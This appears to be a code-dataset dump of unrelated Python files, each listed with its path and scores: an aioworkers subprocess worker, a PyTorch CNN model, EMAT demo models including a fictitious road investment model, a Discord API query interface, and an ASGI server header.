cmd = shlex.split(cmd)
if isinstance(cmd, str):
cmd = cmd,
return cmd
async def run_cmd(self, *args, **kwargs):
if len(args) > 1:
value = args
elif args:
value = args[0]
elif kwargs:
value = kwargs
else:
value = None
cmd = self.make_command(value)
self.logger.info(' '.join(cmd))
process = await self.create_subprocess(*cmd)
self._processes[process.pid] = process
if self._config_stdin:
utils.dump_to_fd(process.stdin, self.context.config)
await process.stdin.drain()
if self._wait:
await process.wait()
else:
return process
if not self._daemon and process.stdout is not None:
data = await process.stdout.read()
return self.decode(data)
async def work(self):
if self._daemon:
await self._event.wait()
return await super().work()
async def _keep_daemon(self):
while True:
try:
process = await self.run_cmd()
self._event.set()
await process.wait()
finally:
self._event.clear()
await asyncio.sleep(1)
async def start(self):
if self._daemon:
self._keeper = self.loop.create_task(self._keep_daemon())
return await super().start()
async def stop(self, force=True):
if self._keeper is not None:
self._keeper.cancel()
self._event.clear()
try:
await self._keeper
except asyncio.CancelledError:
pass
self._keeper = None
for process in self._processes.values():
try:
if process.returncode is not None:
continue
elif force:
process.kill()
else:
process.terminate()
await process.wait()
except ProcessLookupError:
pass
await super().stop(force=force) | aioworkers/worker/subprocess.py | import asyncio
import shlex
import subprocess
import sys
import weakref
from typing import Mapping, Sequence
from .. import utils
from ..core.formatter import FormattedEntity
from .base import Worker
class Subprocess(FormattedEntity, Worker):
"""
config:
cmd: str - shell command with mask python format
list[str] - exec command with mask python format
aioworkers: argv or str for aioworkers subprocess
stdin: [none | PIPE | DEVNULL]
stdout: [none | PIPE | DEVNULL]
stderr: [none | PIPE | STDOUT | DEVNULL]
wait: bool - default True for wait shutdown process
params: dict of params
daemon: true
format: [json|str|bytes]
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._processes = weakref.WeakValueDictionary()
self._cmd = ''
self._shell = False
self._config_stdin = False
self._wait = True
self._daemon = False
self._keeper = None
self.params = {}
async def init(self):
if self.config.get('stdin'):
stdin = getattr(subprocess, self.config.get('stdin'))
elif 'stdin' in self.config:
stdin = None
else:
stdin = subprocess.PIPE
if self.config.get('stdout'):
stdout = getattr(subprocess, self.config.get('stdout'))
elif 'stdout' in self.config:
stdout = None
else:
stdout = subprocess.PIPE
if self.config.get('stderr'):
stderr = getattr(subprocess, self.config.get('stderr'))
else:
stderr = None
self._wait = self.config.get('wait', True)
self._config_stdin = False
if 'aioworkers' in self.config:
cmd = ['{python}', '-m', 'aioworkers', '--config-stdin']
value = self.config['aioworkers']
if isinstance(value, str):
cmd.append(value)
cmd = ' '.join(cmd)
elif isinstance(value, list):
cmd.extend(value)
else:
raise TypeError(value)
stdin = subprocess.PIPE
self._config_stdin = True
elif 'cmd' in self.config:
cmd = self.config['cmd']
else:
raise ValueError
self._cmd = cmd
self._shell = self.config.get('shell', isinstance(cmd, str))
if self._shell:
coro = asyncio.create_subprocess_shell
else:
coro = asyncio.create_subprocess_exec
self.create_subprocess = lambda *args: coro(
*args, stdin=stdin, stdout=stdout,
stderr=stderr, loop=self.loop)
self.params = dict(self.config.get('params', ()))
self.params.setdefault('python', sys.executable)
self.params.setdefault('config', self.config)
self.params.setdefault('worker', self)
self._daemon = self.config.get('daemon')
self._keeper = None
if self._daemon:
self._wait = False
self._event = asyncio.Event(loop=self.loop)
self._event.clear()
await super().init()
@property
def process(self):
for p in self._processes.values():
if p.returncode is None:
return p
def make_command(self, value):
cmd = self._cmd
args = ()
m = dict(self.params)
if isinstance(value, Mapping):
m.update(value)
elif isinstance(value, Sequence):
args = value
elif isinstance(value, str):
args = value,
is_cmd_str = isinstance(cmd, str)
if is_cmd_str:
cmd = cmd.format_map(m)
else:
cmd = [part.format_map(m) for part in cmd]
cmd.extend(args)
if self._shell and not is_cmd_str:
cmd = ' '.join(cmd)
elif not self._shell and is_cmd_str:
cmd = shlex.split(cmd)
if isinstance(cmd, str):
cmd = cmd,
return cmd
async def run_cmd(self, *args, **kwargs):
if len(args) > 1:
value = args
elif args:
value = args[0]
elif kwargs:
value = kwargs
else:
value = None
cmd = self.make_command(value)
self.logger.info(' '.join(cmd))
process = await self.create_subprocess(*cmd)
self._processes[process.pid] = process
if self._config_stdin:
utils.dump_to_fd(process.stdin, self.context.config)
await process.stdin.drain()
if self._wait:
await process.wait()
else:
return process
if not self._daemon and process.stdout is not None:
data = await process.stdout.read()
return self.decode(data)
async def work(self):
if self._daemon:
await self._event.wait()
return await super().work()
async def _keep_daemon(self):
while True:
try:
process = await self.run_cmd()
self._event.set()
await process.wait()
finally:
self._event.clear()
await asyncio.sleep(1)
async def start(self):
if self._daemon:
self._keeper = self.loop.create_task(self._keep_daemon())
return await super().start()
async def stop(self, force=True):
if self._keeper is not None:
self._keeper.cancel()
self._event.clear()
try:
await self._keeper
except asyncio.CancelledError:
pass
self._keeper = None
for process in self._processes.values():
try:
if process.returncode is not None:
continue
elif force:
process.kill()
else:
process.terminate()
await process.wait()
except ProcessLookupError:
pass
await super().stop(force=force) | 0.359252 | 0.074064 |
import torch
from torch import nn
class Model(nn.Module):
def __init__(self):
super().__init__()
self._conv_part = nn.Sequential(
nn.Conv2d(3, 6, 5, padding=2),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Conv2d(6, 16, 5),
nn.ReLU(),
nn.MaxPool2d(2),
)
self._fc_part = nn.Sequential(
nn.Linear(16*5*5, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU()
)
self._pred_part = nn.Sequential(
nn.Linear(64, 64),
nn.Tanh()
)
self._loss = nn.BCEWithLogitsLoss()
def get_repr(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
return fc_in.view(n_batch, n_ex, 64).sum(dim=1)
def forward(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
label_out = batch.label_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
label_out = label_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
predictor = self._pred_part(fc_in.view(n_batch, n_ex, 64).sum(dim=1))
conv_out = self._conv_part(feats_out)
rep_out = self._fc_part(conv_out.view(n_batch, 16*5*5))
score = (predictor * rep_out).sum(dim=1)
labels = (score > 0).float()
loss = self._loss(score, label_out)
return loss, (labels == label_out).float().mean(), labels, predictor | model.py | import torch
from torch import nn
class Model(nn.Module):
def __init__(self):
super().__init__()
self._conv_part = nn.Sequential(
nn.Conv2d(3, 6, 5, padding=2),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Conv2d(6, 16, 5),
nn.ReLU(),
nn.MaxPool2d(2),
)
self._fc_part = nn.Sequential(
nn.Linear(16*5*5, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU()
)
self._pred_part = nn.Sequential(
nn.Linear(64, 64),
nn.Tanh()
)
self._loss = nn.BCEWithLogitsLoss()
def get_repr(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
return fc_in.view(n_batch, n_ex, 64).sum(dim=1)
def forward(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
label_out = batch.label_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
label_out = label_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
predictor = self._pred_part(fc_in.view(n_batch, n_ex, 64).sum(dim=1))
conv_out = self._conv_part(feats_out)
rep_out = self._fc_part(conv_out.view(n_batch, 16*5*5))
score = (predictor * rep_out).sum(dim=1)
labels = (score > 0).float()
loss = self._loss(score, label_out)
return loss, (labels == label_out).float().mean(), labels, predictor | 0.939102 | 0.416441 |
import numpy
class Dummy():
def __init__(self):
'''nothing to do here'''
def calc_pm1(self, exp_vars):
return self.__sum_exp_vars(exp_vars)
def calc_pm2(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 2
def calc_pm10(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 10
def calc_pm100(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 100
def __sum_exp_vars(self,ev):
return ev['exp_var 1'] + ev['exp_var 2']
def __call__(self, **kwargs):
return dict(
pm_1=self.calc_pm1(kwargs),
pm_2=self.calc_pm2(kwargs),
pm_10=self.calc_pm10(kwargs),
pm_100=self.calc_pm100(kwargs),
)
def NoisyDummy(**kwargs):
lever1 = kwargs.get('lever1', 0)
lever2 = kwargs.get('lever2', 0)
uncertain1 = kwargs.get('uncertain1', 3)
uncertain2 = numpy.exp(kwargs.get('uncertain2', -0.7))
uncertain3 = numpy.exp(kwargs.get('uncertain3', 0.7))
certain4 = kwargs.get('certain4', 3)
noise_amplitude = kwargs.get('noise_amplitude', 2.0)
noise_frequency = kwargs.get('noise_frequency', 5.0)
pm_1 = (
- uncertain2 * lever1 * lever1
+ (uncertain1 + certain4) * (lever1 + lever2)
+ noise_amplitude * numpy.sin(noise_frequency * lever1)
)
pm_2 = numpy.minimum(
1.11e+111 * uncertain1,
numpy.exp(
uncertain3 * lever1 * (lever1 + lever2)
+ uncertain1 * lever1
+ noise_amplitude * numpy.cos(noise_frequency * lever2)
)
)
pm_3 = (
noise_amplitude * numpy.cos(noise_frequency * lever1)
+ noise_amplitude * numpy.sin(noise_frequency * lever2)
+ certain4
)
pm_4 = numpy.exp(
uncertain1 + certain4
)
return {'pm_1':pm_1, 'pm_2': pm_2, 'pm_3': pm_3, 'pm_4':pm_4}
def Road_Capacity_Investment(
# constant
free_flow_time=60,
initial_capacity=100,
# uncertainty
alpha=0.15,
beta=4.0,
input_flow=100,
value_of_time=0.01,
unit_cost_expansion=1,
interest_rate=0.03,
yield_curve=0.01,
# policy
expand_capacity=10,
amortization_period=30,
interest_rate_lock=False,
debt_type='GO Bond',
lane_width=10,
**kwargs,
):
"""
A fictitious example model for road capacity investment.
This model simulates a capacity expansion investment on a single
network link. The link volume-delay function is governed by the
`BPR function <https://en.wikipedia.org/wiki/Route_assignment#Frank-Wolfe_algorithm>`_.
This model is a bit contrived, because it is designed to explicitly demonstrate
a wide variety of EMAT features in a transportation planning model that is as simple
as possible. For example, the policy levers are structured so that there is one
of each dtype (float, int, bool, and categorical).
Args:
free_flow_time (float, default 60): The free flow travel time on the link.
initial_capacity (float, default 100): The pre-expansion capacity on the link.
alpha (float, default 0.15): Alpha parameter to the BPR volume-delay function.
beta (float, default 4.0): Beta parameter to the BPR volume-delay function.
input_flow (float, default 100): The future input flow on the link.
value_of_time (float, default 0.01): The value of a unit of travel time savings
per unit of flow on the link.
unit_cost_expansion (float, default 1): The present marginal cost of adding one
unit of capacity to the link (assumes no economies of scale on expansion cost)
interest_rate (float, default 0.03): The interest rate actually incurred for
revenue bonds amortized over 15 years. The interest rate for general obligation
bonds is assumed to be 0.0025 less than this value.
yield_curve (float, default 0.01): The marginal increase in the interest_rate if
the amortization period is 50 years instead of 15. The yield curve is assumed
to be linearly projected to all other possible amortization periods
expand_capacity (float, default 10): The amount of capacity expansion actually
constructed.
amortization_period (int, default 30): The time period over which the construction
costs are amortized.
interest_rate_lock (bool, default False): Whether interest rates are locked at
the assumed current rate of 0.03 / 0.01 or allowed to float.
debt_type ('GO Bond', 'Rev Bond', 'Paygo'): Type of financing. General obligation
bonds are assumed to have a lower interest rate than revenue bonds, but
may be politically less desirable. Pay-as-you-go financing incurs no actual
interest costs, but requires actually having the funds available.
lane_width (float, default 10): The width of lanes on the roadway. This parameter
is intentionally wacky, causing massive congestion for any value other than 10,
to demonstrate what might happen with broken model inputs.
Returns:
dict:
no_build_travel_time
The average travel time on the link if no
capacity expansion was constructed.
build_travel_time
The average travel time on the link after expansion.
time_savings
The average travel time savings as a result of the
expansion.
value_of_time_savings
The total value of the travel time savings,
accounting for the time savings per traveler, the total flow, and
the value of time.
present_cost_expansion
The present cost of building the expansion
cost_of_capacity_expansion
The annual payment to finance the expansion,
when amortized.
net_benefits
The value of the time savings minus the annual payment.
"""
debt_type = debt_type.lower()
assert debt_type in ('go bond', 'paygo', 'rev bond')
average_travel_time0 = free_flow_time * (1 + alpha*(input_flow/initial_capacity)**beta)
capacity = initial_capacity + expand_capacity
average_travel_time1 = free_flow_time * (1 + alpha*(input_flow/capacity)**beta)
average_travel_time1 += (numpy.absolute(lane_width-10)*1000)**0.5
travel_time_savings = average_travel_time0 - average_travel_time1
value_of_time_savings = value_of_time * travel_time_savings * input_flow
present_cost_of_capacity_expansion = float(unit_cost_expansion * expand_capacity)
if interest_rate_lock:
interest_rate = 0.03
yield_curve = 0.01
if (debt_type == 'go bond'):
interest_rate -= 0.0025
elif (debt_type == 'paygo'):
interest_rate = 0
effective_interest_rate = interest_rate + yield_curve * (amortization_period-15) / 35
cost_of_capacity_expansion = numpy.pmt(effective_interest_rate,
amortization_period,
present_cost_of_capacity_expansion, )
return dict(
no_build_travel_time=average_travel_time0,
build_travel_time=average_travel_time1,
time_savings=travel_time_savings,
value_of_time_savings=value_of_time_savings,
present_cost_expansion=present_cost_of_capacity_expansion,
cost_of_capacity_expansion=-cost_of_capacity_expansion,
net_benefits = value_of_time_savings + cost_of_capacity_expansion,
)
def _Road_Capacity_Investment_CmdLine():
"""
This is a demo for calling a core model function on the command line.
"""
import argparse, pandas, os, numpy, sys, warnings
parser = argparse.ArgumentParser()
parser.add_argument('--levers', type=str, default='levers.yml', help='Levers Yaml File')
parser.add_argument('--uncs', type=str, default="uncs.yml", help='Uncertainties Yaml File')
parser.add_argument('--no-random-crashes', action='store_true', help='disable random crashes')
args = parser.parse_args()
import logging
logger = logging.getLogger('emat.RoadTest')
file_handler = logging.FileHandler("emat-road-test.log")
file_handler.setLevel(10)
LOG_FORMAT = '[%(asctime)s] %(name)s.%(levelname)s: %(message)s'
file_handler.setFormatter(logging.Formatter(LOG_FORMAT))
console_handler = logging.StreamHandler(stream=sys.stdout)
console_handler.setLevel(20)
console_handler.setFormatter(logging.Formatter(LOG_FORMAT))
logger.addHandler(console_handler)
logger.addHandler(file_handler)
logger.setLevel(10)
logger.info("running emat-road-test-demo")
logger.debug(str(args))
logger.debug(str(os.getcwd()))
import yaml
if os.path.exists(args.levers):
with open(args.levers, 'rt') as f:
levers = yaml.safe_load(f)
else:
levers = {'mandatory_unused_lever':42}
if os.path.exists(args.uncs):
with open(args.uncs, 'rt') as f:
uncs = yaml.safe_load(f)
else:
uncs = {}
if 'mandatory_unused_lever' not in levers:
raise ValueError("missing 'mandatory_unused_lever'")
if levers['mandatory_unused_lever'] != 42:
raise ValueError("incorrect value for 'mandatory_unused_lever', must be 42")
if 'unit_cost_expansion' in uncs:
raise ValueError("cannot give 'unit_cost_expansion', use 'labor_unit_cost_expansion' and 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) <= uncs.get('materials_unit_cost_expansion', 0):
raise ValueError("'labor_unit_cost_expansion' cannot be less than or equal 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) > uncs.get('materials_unit_cost_expansion', 0)*2:
raise ValueError("'labor_unit_cost_expansion' cannot be more than double 'materials_unit_cost_expansion'")
unit_cost_expansion = uncs.pop('labor_unit_cost_expansion', 0) + uncs.pop('materials_unit_cost_expansion', 0)
uncs['unit_cost_expansion'] = unit_cost_expansion
# (pseudo)random crash
if not args.no_random_crashes:
if 'expand_capacity' in levers and levers['expand_capacity'] > 90 and not os.path.exists('prevent_random_crash.txt'):
with open('prevent_random_crash.txt', 'wt') as f:
f.write("this file will prevent random crashes in `emat-road-test-demo`")
logger.error("Random crash, ha ha!")
sys.exit(-9)
try:
for k,v in levers.items():
logger.debug(f"lever: {k} = {v}")
for k,v in uncs.items():
logger.debug(f"uncertainty: {k} = {v}")
result = Road_Capacity_Investment(**levers, **uncs)
for k,v in result.items():
logger.debug(f"result: {k} = {v}")
result1 = {str(k):float(result[k]) for k in ['no_build_travel_time','build_travel_time','time_savings']}
result2 = pandas.DataFrame({
'value_of_time_savings': [numpy.exp(result['value_of_time_savings']/1000), numpy.nan],
'present_cost_expansion': [numpy.nan, result['present_cost_expansion']],
'cost_of_capacity_expansion': [numpy.exp(result['cost_of_capacity_expansion']/1000), numpy.nan],
'net_benefits': [numpy.nan,result['net_benefits']],
}, index=['exp','plain'])
with open('output.yaml', 'wt') as f:
yaml.safe_dump(result1, f)
result2.to_csv('output.csv.gz')
logger.info("emat-road-test-demo completed without errors")
except:
logger.exception("unintentional crash")
sys.exit(-8) | emat/model/core_python/core_python_examples.py |
import numpy
class Dummy():
def __init__(self):
'''nothing to do here'''
def calc_pm1(self, exp_vars):
return self.__sum_exp_vars(exp_vars)
def calc_pm2(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 2
def calc_pm10(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 10
def calc_pm100(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 100
def __sum_exp_vars(self,ev):
return ev['exp_var 1'] + ev['exp_var 2']
def __call__(self, **kwargs):
return dict(
pm_1=self.calc_pm1(kwargs),
pm_2=self.calc_pm2(kwargs),
pm_10=self.calc_pm10(kwargs),
pm_100=self.calc_pm100(kwargs),
)
def NoisyDummy(**kwargs):
lever1 = kwargs.get('lever1', 0)
lever2 = kwargs.get('lever2', 0)
uncertain1 = kwargs.get('uncertain1', 3)
uncertain2 = numpy.exp(kwargs.get('uncertain2', -0.7))
uncertain3 = numpy.exp(kwargs.get('uncertain3', 0.7))
certain4 = kwargs.get('certain4', 3)
noise_amplitude = kwargs.get('noise_amplitude', 2.0)
noise_frequency = kwargs.get('noise_frequency', 5.0)
pm_1 = (
- uncertain2 * lever1 * lever1
+ (uncertain1 + certain4) * (lever1 + lever2)
+ noise_amplitude * numpy.sin(noise_frequency * lever1)
)
pm_2 = numpy.minimum(
1.11e+111 * uncertain1,
numpy.exp(
uncertain3 * lever1 * (lever1 + lever2)
+ uncertain1 * lever1
+ noise_amplitude * numpy.cos(noise_frequency * lever2)
)
)
pm_3 = (
noise_amplitude * numpy.cos(noise_frequency * lever1)
+ noise_amplitude * numpy.sin(noise_frequency * lever2)
+ certain4
)
pm_4 = numpy.exp(
uncertain1 + certain4
)
return {'pm_1':pm_1, 'pm_2': pm_2, 'pm_3': pm_3, 'pm_4':pm_4}
def Road_Capacity_Investment(
# constant
free_flow_time=60,
initial_capacity=100,
# uncertainty
alpha=0.15,
beta=4.0,
input_flow=100,
value_of_time=0.01,
unit_cost_expansion=1,
interest_rate=0.03,
yield_curve=0.01,
# policy
expand_capacity=10,
amortization_period=30,
interest_rate_lock=False,
debt_type='GO Bond',
lane_width=10,
**kwargs,
):
"""
A fictitious example model for road capacity investment.
This model simulates a capacity expansion investment on a single
network link. The link volume-delay function is governed by the
`BPR function <https://en.wikipedia.org/wiki/Route_assignment#Frank-Wolfe_algorithm>`_.
This model is a bit contrived, because it is designed to explicitly demonstrate
a wide variety of EMAT features in a transportation planning model that is as simple
as possible. For example, the policy levers are structured so that there is one
of each dtype (float, int, bool, and categorical).
Args:
free_flow_time (float, default 60): The free flow travel time on the link.
initial_capacity (float, default 100): The pre-expansion capacity on the link.
alpha (float, default 0.15): Alpha parameter to the BPR volume-delay function.
beta (float, default 4.0): Beta parameter to the BPR volume-delay function.
input_flow (float, default 100): The future input flow on the link.
value_of_time (float, default 0.01): The value of a unit of travel time savings
per unit of flow on the link.
unit_cost_expansion (float, default 1): The present marginal cost of adding one
unit of capacity to the link (assumes no economies of scale on expansion cost)
interest_rate (float, default 0.03): The interest rate actually incurred for
revenue bonds amortized over 15 years. The interest rate for general obligation
bonds is assumed to be 0.0025 less than this value.
yield_curve (float, default 0.01): The marginal increase in the interest_rate if
the amortization period is 50 years instead of 15. The yield curve is assumed
to be linearly projected to all other possible amortization periods
expand_capacity (float, default 10): The amount of capacity expansion actually
constructed.
amortization_period (int, default 30): The time period over which the construction
costs are amortized.
interest_rate_lock (bool, default False): Whether interest rates are locked at
the assumed current rate of 0.03 / 0.01 or allowed to float.
debt_type ('GO Bond', 'Rev Bond', 'Paygo'): Type of financing. General obligation
bonds are assumed to have a lower interest rate than revenue bonds, but
may be politically less desirable. Pay-as-you-go financing incurs no actual
interest costs, but requires actually having the funds available.
lane_width (float, default 10): The width of lanes on the roadway. This parameter
is intentionally wacky, causing massive congestion for any value other than 10,
to demonstrate what might happen with broken model inputs.
Returns:
dict:
no_build_travel_time
The average travel time on the link if no
capacity expansion was constructed.
build_travel_time
The average travel time on the link after expansion.
time_savings
The average travel time savings as a result of the
expansion.
value_of_time_savings
The total value of the travel time savings,
accounting for the time savings per traveler, the total flow, and
the value of time.
present_cost_expansion
The present cost of building the expansion
cost_of_capacity_expansion
The annual payment to finance the expansion,
when amortized.
net_benefits
The value of the time savings minus the annual payment.
"""
debt_type = debt_type.lower()
assert debt_type in ('go bond', 'paygo', 'rev bond')
average_travel_time0 = free_flow_time * (1 + alpha*(input_flow/initial_capacity)**beta)
capacity = initial_capacity + expand_capacity
average_travel_time1 = free_flow_time * (1 + alpha*(input_flow/capacity)**beta)
average_travel_time1 += (numpy.absolute(lane_width-10)*1000)**0.5
travel_time_savings = average_travel_time0 - average_travel_time1
value_of_time_savings = value_of_time * travel_time_savings * input_flow
present_cost_of_capacity_expansion = float(unit_cost_expansion * expand_capacity)
if interest_rate_lock:
interest_rate = 0.03
yield_curve = 0.01
if (debt_type == 'go bond'):
interest_rate -= 0.0025
elif (debt_type == 'paygo'):
interest_rate = 0
effective_interest_rate = interest_rate + yield_curve * (amortization_period-15) / 35
cost_of_capacity_expansion = numpy.pmt(effective_interest_rate,
amortization_period,
present_cost_of_capacity_expansion, )
return dict(
no_build_travel_time=average_travel_time0,
build_travel_time=average_travel_time1,
time_savings=travel_time_savings,
value_of_time_savings=value_of_time_savings,
present_cost_expansion=present_cost_of_capacity_expansion,
cost_of_capacity_expansion=-cost_of_capacity_expansion,
net_benefits = value_of_time_savings + cost_of_capacity_expansion,
)
def _Road_Capacity_Investment_CmdLine():
"""
This is a demo for calling a core model function on the command line.
"""
import argparse, pandas, os, numpy, sys, warnings
parser = argparse.ArgumentParser()
parser.add_argument('--levers', type=str, default='levers.yml', help='Levers Yaml File')
parser.add_argument('--uncs', type=str, default="uncs.yml", help='Uncertainties Yaml File')
parser.add_argument('--no-random-crashes', action='store_true', help='disable random crashes')
args = parser.parse_args()
import logging
logger = logging.getLogger('emat.RoadTest')
file_handler = logging.FileHandler("emat-road-test.log")
file_handler.setLevel(10)
LOG_FORMAT = '[%(asctime)s] %(name)s.%(levelname)s: %(message)s'
file_handler.setFormatter(logging.Formatter(LOG_FORMAT))
console_handler = logging.StreamHandler(stream=sys.stdout)
console_handler.setLevel(20)
console_handler.setFormatter(logging.Formatter(LOG_FORMAT))
logger.addHandler(console_handler)
logger.addHandler(file_handler)
logger.setLevel(10)
logger.info("running emat-road-test-demo")
logger.debug(str(args))
logger.debug(str(os.getcwd()))
import yaml
if os.path.exists(args.levers):
with open(args.levers, 'rt') as f:
levers = yaml.safe_load(f)
else:
levers = {'mandatory_unused_lever':42}
if os.path.exists(args.uncs):
with open(args.uncs, 'rt') as f:
uncs = yaml.safe_load(f)
else:
uncs = {}
if 'mandatory_unused_lever' not in levers:
raise ValueError("missing 'mandatory_unused_lever'")
if levers['mandatory_unused_lever'] != 42:
raise ValueError("incorrect value for 'mandatory_unused_lever', must be 42")
if 'unit_cost_expansion' in uncs:
raise ValueError("cannot give 'unit_cost_expansion', use 'labor_unit_cost_expansion' and 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) <= uncs.get('materials_unit_cost_expansion', 0):
raise ValueError("'labor_unit_cost_expansion' cannot be less than or equal 'materials_unit_cost_expansion'")
if uncs.get('labor_unit_cost_expansion', 0) > uncs.get('materials_unit_cost_expansion', 0)*2:
raise ValueError("'labor_unit_cost_expansion' cannot be more than double 'materials_unit_cost_expansion'")
unit_cost_expansion = uncs.pop('labor_unit_cost_expansion', 0) + uncs.pop('materials_unit_cost_expansion', 0)
uncs['unit_cost_expansion'] = unit_cost_expansion
# (pseudo)random crash
if not args.no_random_crashes:
if 'expand_capacity' in levers and levers['expand_capacity'] > 90 and not os.path.exists('prevent_random_crash.txt'):
with open('prevent_random_crash.txt', 'wt') as f:
f.write("this file will prevent random crashes in `emat-road-test-demo`")
logger.error("Random crash, ha ha!")
sys.exit(-9)
try:
for k,v in levers.items():
logger.debug(f"lever: {k} = {v}")
for k,v in uncs.items():
logger.debug(f"uncertainty: {k} = {v}")
result = Road_Capacity_Investment(**levers, **uncs)
for k,v in result.items():
logger.debug(f"result: {k} = {v}")
result1 = {str(k):float(result[k]) for k in ['no_build_travel_time','build_travel_time','time_savings']}
result2 = pandas.DataFrame({
'value_of_time_savings': [numpy.exp(result['value_of_time_savings']/1000), numpy.nan],
'present_cost_expansion': [numpy.nan, result['present_cost_expansion']],
'cost_of_capacity_expansion': [numpy.exp(result['cost_of_capacity_expansion']/1000), numpy.nan],
'net_benefits': [numpy.nan,result['net_benefits']],
}, index=['exp','plain'])
with open('output.yaml', 'wt') as f:
yaml.safe_dump(result1, f)
result2.to_csv('output.csv.gz')
logger.info("emat-road-test-demo completed without errors")
except:
logger.exception("unintentional crash")
sys.exit(-8) | 0.776369 | 0.421135 |
import abc
import typing
class Query(abc.ABC):
__slots__ = ["token", "token_type"]
def __init__(self, token: str, token_type: str):
self.token = token
self.token_type = token_type
@abc.abstractmethod
def channel(self, snonwflake: int) -> typing.Dict:
"""Interface for the REST API query to get channels.
Parameters:
snowflake: int
The channel ID of a Discord channel
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def user(self, snowflake: int) -> typing.Dict:
"""Interface for the REST API query to get user.
Parameters:
snowflake: int
The ID of a Discord User
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def current_user(self) -> typing.Dict:
"""Interface for the REST API query to get current user.
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_me(self, args: dict) -> typing.Dict:
"""Interface for the REST API query to modify current user.
Returns:
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_channel(self, channel_id: int, args: typing.Dict):
"""Interface for the REST API query to modify guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def delete_channel(self, channel_id):
"""Interface for the REST API query to delete guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
"""
@abc.abstractmethod
def leave_guild(self, snowflake: int):
"""Interface for the REST API query to leave a guild.
Returns:
code: int
Code for response status. Will return 204 on success
"""
@abc.abstractmethod
def current_user_dms(self) -> typing.Dict:
"""Interface for the REST API query to fetch current user's DMs list
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def create_dm(self, recipient_id: int) -> typing.Dict:
"""Interface for the REST API query to create a DM with a specific user according to ID
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
""" | zenora/base/query.py | import abc
import typing
class Query(abc.ABC):
__slots__ = ["token", "token_type"]
def __init__(self, token: str, token_type: str):
self.token = token
self.token_type = token_type
@abc.abstractmethod
def channel(self, snonwflake: int) -> typing.Dict:
"""Interface for the REST API query to get channels.
Parameters:
snowflake: int
The channel ID of a Discord channel
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def user(self, snowflake: int) -> typing.Dict:
"""Interface for the REST API query to get user.
Parameters:
snowflake: int
The ID of a Discord User
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def current_user(self) -> typing.Dict:
"""Interface for the REST API query to get current user.
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_me(self, args: dict) -> typing.Dict:
"""Interface for the REST API query to modify current user.
Returns:
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def modify_channel(self, channel_id: int, args: typing.Dict):
"""Interface for the REST API query to modify guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
typing.Dict:
A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def delete_channel(self, channel_id):
"""Interface for the REST API query to delete guild channel.
Returns:
channel_id: int
The snowflake ID of the channel.
"""
@abc.abstractmethod
def leave_guild(self, snowflake: int):
"""Interface for the REST API query to leave a guild.
Returns:
code: int
Code for response status. Will return 204 on success
"""
@abc.abstractmethod
def current_user_dms(self) -> typing.Dict:
"""Interface for the REST API query to fetch current user's DMs list
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
"""
@abc.abstractmethod
def create_dm(self, recipient_id: int) -> typing.Dict:
"""Interface for the REST API query to create a DM with a specific user according to ID
Returns:
typing.Dict: A dictionary object that will be used to parse the data
into objects
""" | 0.805326 | 0.405743 |
"""ASGI server."""
import argparse
import os
import sys
import uvicorn
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse, PlainTextResponse, Response
